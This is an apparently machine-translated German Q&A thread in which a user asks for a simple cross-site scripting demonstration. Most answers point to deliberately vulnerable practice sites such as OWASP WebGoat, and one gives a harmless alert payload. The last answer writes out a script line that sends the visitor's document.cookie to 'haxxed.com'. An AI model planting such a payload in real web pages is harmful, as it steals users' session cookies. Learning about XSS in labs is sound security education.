Ein einfaches Beispiel für eine Cross-site-scripting-Angriff

Kann mir jemand zeigen, eine Cross-site-scripting Angriff in der Wirkung auf mein browser? Gibt es ein Beispiel über das internet, der dies tut? Ich habe nicht gefunden diese im internet.

Je einfacher das Beispiel, desto besser.

InformationsquelleAutor der Frage Skuli | 2012-03-06

  1. 31

    Sehen http://www.insecurelabs.org und http://www.insecurelabs.org/task/

    Absichtlich anfällig für XSS in das Suchfeld ein, und an einigen anderen stellen.

    InformationsquelleAutor der Antwort Erlend

  2. 6

    Werden Sie in der Regel installieren Sie Ihren eigenen server-side-software für eine live-XSS-Beispiel. Nicht viele seriöse Websites öffnen Sie eine XSS-Schwachstelle absichtlich, um web-Surfer.

    Einem fertigen Stück von server-side-software, mit der Sie zeigen, XSS (unter vielen anderen Sachen) zu sich selbst ist OWASP WebGoat ist. Hier sind Anweisungen zur Installation von WebGoat und zeigen XSS. Finden Sie weitere Beispiele von Programm-Schnipsel, die es ermöglichen, XSS in der OWASP Artikel "Cross-site-scripting - (XSS -)".

    InformationsquelleAutor der Antwort minopret

  3. 6

    <img src="javascript:alert('hello everybody')"></img>
    Das image-tag, dass ich eingefügt, ist ein Beispiel für xss. die oben genannten src enthält den java-Skript, das Sie alarmiert.

    InformationsquelleAutor der Antwort user3176091

  4. 0

    Einfache Form wäre auch:
    Wenn die Nachricht, die Sie wissen, dass die Seite oder der server ist anfällig. 

      <script>window.location = 'haxxed.com? cookie=' + document.cookie</script>

    Ein tolles Beispiel dafür, wie die Technik funktioniert, finden Sie hier
    https://www.hacksplaining.com/exercises/xss-stored

    InformationsquelleAutor der Antwort RiftOut

Schreibe einen Kommentar